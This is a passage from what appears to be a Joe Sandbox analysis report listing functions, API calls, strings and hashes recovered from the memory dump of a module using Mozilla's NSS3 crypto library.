security, xrefs: 6CA80F5C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: b507a65ce53253ade71a63c5caa10441335008bf25588af4bb7d999ec4dc07fc
Instruction ID: 78f39054e544d608913f814951c98c32b89672c854ae9378291205485654947a
Opcode Fuzzy Hash: b507a65ce53253ade71a63c5caa10441335008bf25588af4bb7d999ec4dc07fc
Instruction Fuzzy Hash: 2A2106B1904244ABE7109F24DD41AAE77B4EF4965CF048518FD189B701FB31E989CBE2

Function 6CB92AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CB92AE8
strdup.MOZGLUE(00000000), ref: 6CB92AFA
PR_ExitMonitor.NSS3 ref: 6CB92B0B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LD_LIBRARY_PATH), ref: 6CB92B1E
strdup.MOZGLUE(.;\lib), ref: 6CB92B32
PR_ExitMonitor.NSS3 ref: 6CB92B4A
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB92B59

Strings

.;\lib, xrefs: 6CB92B29, 6CB92B31
LD_LIBRARY_PATH, xrefs: 6CB92B19

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$Exitstrdup$EnterErrorgetenv
String ID: .;\lib$LD_LIBRARY_PATH
API String ID: 2438426442-3838498337
Opcode ID: f069dfd636d314c6dad6f6b5e00f778d2f71327246a26c5d0f9fd77d4341a9d7
Instruction ID: d30e73500e2d33465e59a22c4bb1e51f7752135d7c0c5aa11e5ba1e94a99c91a
Opcode Fuzzy Hash: f069dfd636d314c6dad6f6b5e00f778d2f71327246a26c5d0f9fd77d4341a9d7
Instruction Fuzzy Hash: 4501A7B5F041915BEE506BA59D05B5A37B89B0779DF180030D80993A12FB21D828C793

Function 6CB1AB00 Relevance: 15.3, APIs: 10, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB1A6D0: PORT_ZAlloc_Util.NSS3(00000A38,00000000,?,6CB180C1), ref: 6CB1A6F9
Part of subcall function 6CB1A6D0: memcpy.VCRUNTIME140(00000210,6CBE0BEC,0000011C), ref: 6CB1A869

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,?,6CB180AD), ref: 6CB1AB48

Part of subcall function 6CADFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAD8D2D,?,00000000,?), ref: 6CADFB85
Part of subcall function 6CADFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CADFBB1

PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB180AD), ref: 6CB1AB8E
PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB180AD), ref: 6CB1ABA7
memcpy.VCRUNTIME140(?,00000210,0000011C,?,?,?,?,6CB180AD), ref: 6CB1ABFE
memcpy.VCRUNTIME140(?,000006AA,?,?,?,?,?,?,?,?,6CB180AD), ref: 6CB1AC1C
memcpy.VCRUNTIME140(?,000006C0,?,?,?,?,?,?,?,?,?,?,?,6CB180AD), ref: 6CB1AC48

Part of subcall function 6CB15BC0: PR_EnterMonitor.NSS3(8B105D8B,?,?,6CB180E3,00000000), ref: 6CB15BD6
Part of subcall function 6CB15BC0: PR_EnterMonitor.NSS3(840FC085,?,?,6CB180E3,00000000), ref: 6CB15BED
Part of subcall function 6CB15BC0: PR_EnterMonitor.NSS3(07890478,?,?,6CB180E3,00000000), ref: 6CB15C04
Part of subcall function 6CB15BC0: PR_EnterMonitor.NSS3(000000F4,?,?,6CB180E3,00000000), ref: 6CB15C1B
Part of subcall function 6CB15BC0: PR_Unlock.NSS3(0140BCE8,?,?,6CB180E3,00000000), ref: 6CB15C4C
Part of subcall function 6CB15BC0: PR_Unlock.NSS3(08C48300,?,?,6CB180E3,00000000), ref: 6CB15C5F
Part of subcall function 6CB15BC0: PR_ExitMonitor.NSS3(8B105D8B,?,?,6CB180E3,00000000), ref: 6CB15C76
Part of subcall function 6CB15BC0: PR_ExitMonitor.NSS3(840FC085,?,?,6CB180E3,00000000), ref: 6CB15C8D
Part of subcall function 6CB15BC0: PR_ExitMonitor.NSS3(07890478,?,?,6CB180E3,00000000), ref: 6CB15CA4
Part of subcall function 6CB15BC0: PR_ExitMonitor.NSS3(000000F4,?,?,6CB180E3,00000000), ref: 6CB15CBB

PORT_ZAlloc_Util.NSS3(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB180AD), ref: 6CB1ACED

Part of subcall function 6CAE0D30: calloc.MOZGLUE ref: 6CAE0D50
Part of subcall function 6CAE0D30: TlsGetValue.KERNEL32 ref: 6CAE0D6D

PORT_ZAlloc_Util.NSS3(0000001C,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB180AD), ref: 6CB1AD52
SECKEY_CopyPrivateKey.NSS3(?), ref: 6CB1AEE5
SECKEY_CopyPublicKey.NSS3(?), ref: 6CB1AEFC

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$Util$memcpy$Alloc_EnterExit$Copy$Strdup_Unlock$ArenaItem_PrivatePublicValuecalloc
String ID:
API String ID: 3422837898-0
Opcode ID: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction ID: 2b20278c7a5dc2263c2f5d3692ee500e771630bf9cda769f123cc2136cb4a5f5
Opcode Fuzzy Hash: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction Fuzzy Hash: 41D1E7B4A056418FDB44CF68C580BE5B7E5FB49314F1842B9DC1C9BB06E734A998CFA1

Function 6CA86DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CA87D8F,6CA87D8F,?,?), ref: 6CA86DC8

Part of subcall function 6CADFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CADFE08
Part of subcall function 6CADFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CADFE1D
Part of subcall function 6CADFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CADFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CA87D8F,?,?), ref: 6CA86DD5

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBA8FA0,00000000,?,?,?,?,6CA87D8F,?,?), ref: 6CA86DF7

Part of subcall function 6CADB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBB18D0,?), ref: 6CADB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA86E35

Part of subcall function 6CADFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CADFE29
Part of subcall function 6CADFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CADFE3D
Part of subcall function 6CADFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CADFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA86E4C

Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBA8FE0,00000000), ref: 6CA86E82

Part of subcall function 6CA86AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CA8B21D,00000000,00000000,6CA8B219,?,6CA86BFB,00000000,?,00000000,00000000,?,?,?,6CA8B21D), ref: 6CA86B01
Part of subcall function 6CA86AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA86B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA86F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA86F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBA8FE0,00000000), ref: 6CA86F6B
PR_SetError.NSS3(FFFFE005,00000000,6CA87D8F,?,?), ref: 6CA86FE1

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 6244cf8081a40fb0ef909fb976e7bd7004d8c735aa97b102430e800702224efe
Instruction ID: f366c5490138f87f87a5531b74e30ff445af470cf8941f95b39f728e490959f3
Opcode Fuzzy Hash: 6244cf8081a40fb0ef909fb976e7bd7004d8c735aa97b102430e800702224efe
Instruction Fuzzy Hash: 1F718171D212469BEB00CF55CD40BAAB7B4BF58308F194229E858DBB11F771EAD4CB90

Function 6CAC0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAC1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC1085
PK11_GetAllTokens.NSS3 ref: 6CAC10B1
free.MOZGLUE(?), ref: 6CAC1107
PR_SetError.NSS3(00000000,00000000), ref: 6CAC1172
free.MOZGLUE(?), ref: 6CAC1182
free.MOZGLUE(?), ref: 6CAC11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CAC11C5

Part of subcall function 6CAC52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CA9EAC5,00000001), ref: 6CAC52DF
Part of subcall function 6CAC52C0: EnterCriticalSection.KERNEL32(?), ref: 6CAC52F3
Part of subcall function 6CAC52C0: PR_Unlock.NSS3(?), ref: 6CAC5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAC11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAC11F3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: e13482d0ed9dcc2742a925b0f5c76a971829a8ca16194c23c69d739fb93502de
Instruction ID: c2f288987d0c5ff9e47acf0dd8e4d3911558b867030c7d941bc3b940ce8d10df
Opcode Fuzzy Hash: e13482d0ed9dcc2742a925b0f5c76a971829a8ca16194c23c69d739fb93502de
Instruction Fuzzy Hash: 286175B4F013459BEB00DFA4D941BAEB7B5EF04348F184128ED19AB741EB31E985CB92

Function 6CAC4A20 Relevance: 15.2, APIs: 10, Instructions: 182COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?), ref: 6CAC4A4B
PK11_GetInternalSlot.NSS3 ref: 6CAC4A59
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CAC4AC6
TlsGetValue.KERNEL32 ref: 6CAC4B17
EnterCriticalSection.KERNEL32(?), ref: 6CAC4B2B
PR_Unlock.NSS3(?), ref: 6CAC4B77
PK11_FreeSymKey.NSS3(?), ref: 6CAC4B87
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CAC4B9A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAC4BA9
PR_SetError.NSS3(00000000,00000000), ref: 6CAC4BC1

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$K11_$DestroyPrivatecalloc$CriticalDoesEnterErrorFreeInternalItem_MechanismSectionSlotUnlockUtilZfree
String ID:
API String ID: 3936029921-0
Opcode ID: 1fb068406e51ab492523af7eeab0f0cc4877e8c3e6439f5d07366e1520402ea1
Instruction ID: fd5ca67469ddb5cc49151f74f5f8e416310a4b9d6fbd241c4338022637de2e09
Opcode Fuzzy Hash: 1fb068406e51ab492523af7eeab0f0cc4877e8c3e6439f5d07366e1520402ea1
Instruction Fuzzy Hash: 8A5180B5F006199FDB00DF68DD41AAFB7F9AF48318F184129E809A7701E731ED548BA6

Function 6CACADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE10
EnterCriticalSection.KERNEL32(?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CAAD079,00000000,00000001), ref: 6CACAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE7F
TlsGetValue.KERNEL32(?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAEF1
free.MOZGLUE(6CAACDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAACDBB,?), ref: 6CACAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAF30

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: c19cea3e51e755c81b556554828bf95524971b1441c7c2d779ee09270bf86cfe
Instruction ID: b71b68f9fa35aa94801bb8b0902c4727d852df23d36824b1bcbae9874e980d2f
Opcode Fuzzy Hash: c19cea3e51e755c81b556554828bf95524971b1441c7c2d779ee09270bf86cfe
Instruction Fuzzy Hash: D05181B5A00A11AFDB01DF29D884B6AB7B5FF05318F184664E81997E11E731FCA4CBD2

Function 6CAA4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAAAB7F,?,00000000,?), ref: 6CAA4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CAAAB7F,?,00000000,?), ref: 6CAA4CC8
TlsGetValue.KERNEL32(?,6CAAAB7F,?,00000000,?), ref: 6CAA4CE0
EnterCriticalSection.KERNEL32(?,?,6CAAAB7F,?,00000000,?), ref: 6CAA4CF4
PL_HashTableLookup.NSS3(?,?,?,6CAAAB7F,?,00000000,?), ref: 6CAA4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CAA4D10

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

PR_Now.NSS3(?,00000000,?), ref: 6CAA4D26

Part of subcall function 6CB49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB90A27), ref: 6CB49DC6
Part of subcall function 6CB49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB90A27), ref: 6CB49DD1
Part of subcall function 6CB49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB49DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CAA4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CAA4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CAA4E02

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 217ed1b544d7969505c201d97c8688e132d75fe91a47d2f11a17036e57088401
Instruction ID: 36234a91149d57904891b6c4f250e506e65b9f541e7d26349dae4a83d2732bf1
Opcode Fuzzy Hash: 217ed1b544d7969505c201d97c8688e132d75fe91a47d2f11a17036e57088401
Instruction Fuzzy Hash: 1541B7B5900605AFEB019F78ED41A6A77B8BF05259F184170FC1887B12EF31D999C7E1

Function 6CB24A70 Relevance: 15.1, APIs: 10, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00000048,00000A20,0000032C,?,00000000,?,6CB1AEC0,00000A20,00000000), ref: 6CB24A8B

Part of subcall function 6CAE0D30: calloc.MOZGLUE ref: 6CAE0D50
Part of subcall function 6CAE0D30: TlsGetValue.KERNEL32 ref: 6CAE0D6D

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,00000000), ref: 6CB24AAA

Part of subcall function 6CADFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAD8D2D,?,00000000,?), ref: 6CADFB85
Part of subcall function 6CADFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CADFBB1

PORT_Strdup_Util.NSS3(?,?,?,?,00000000), ref: 6CB24ABD

Part of subcall function 6CAE0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA82AF5,?,?,?,?,?,6CA80A1B,00000000), ref: 6CAE0F1A
Part of subcall function 6CAE0F10: malloc.MOZGLUE(00000001), ref: 6CAE0F30
Part of subcall function 6CAE0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAE0F42

SECITEM_CopyItem_Util.NSS3(00000000,00000020,?,?,?,?,?,00000000), ref: 6CB24AD6
SECITEM_CopyItem_Util.NSS3(00000000,00000034,?,?,?,?,?,?,?,?,00000000), ref: 6CB24AEC

Part of subcall function 6CADFB60: PORT_Alloc_Util.NSS3(E0056800,00000000,?,?,6CAD8D2D,?,00000000,?), ref: 6CADFB9B

SECITEM_ZfreeItem_Util.NSS3(00000020,00000000,?,?,?,00000000), ref: 6CB24B49
SECITEM_ZfreeItem_Util.NSS3(-00000034,00000000,?,?,?,?,?,00000000), ref: 6CB24B58
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6CB24B64
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB24B74
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB24B7E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Item_$Alloc_CopyZfree$freememcpy$ArenaStrdup_Valuecallocmallocstrlen
String ID:
API String ID: 476651045-0
Opcode ID: 35e9d161185d2b05f8c3da21b5a0192861165554c22158f3958931e32672979c
Instruction ID: 8c600979fbb9828ddd42ca64f8ab825d1373e485117b3d60f3ddedd8f83a88e3
Opcode Fuzzy Hash: 35e9d161185d2b05f8c3da21b5a0192861165554c22158f3958931e32672979c
Instruction Fuzzy Hash: B231A0B59002459FD710CF65DD85A677BB8EF19248B084569EC4ECBB02F731F509CBA2

Function 6CAA89C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6CAAAE9B,00000000,?,?), ref: 6CAA89DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6CA82D6B,?,?,00000000), ref: 6CAA89EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6CA82D6B), ref: 6CAA8A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6CA82D6B,?), ref: 6CAA8A11

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: 0d13176e34e052fd6c9b21acb279ad60eac6435ad2db25299466b0f63c1e2e67
Instruction ID: 021a568bf8e38e2a9008fdfe6755e3724be9bc194506c5743c3380500562e87f
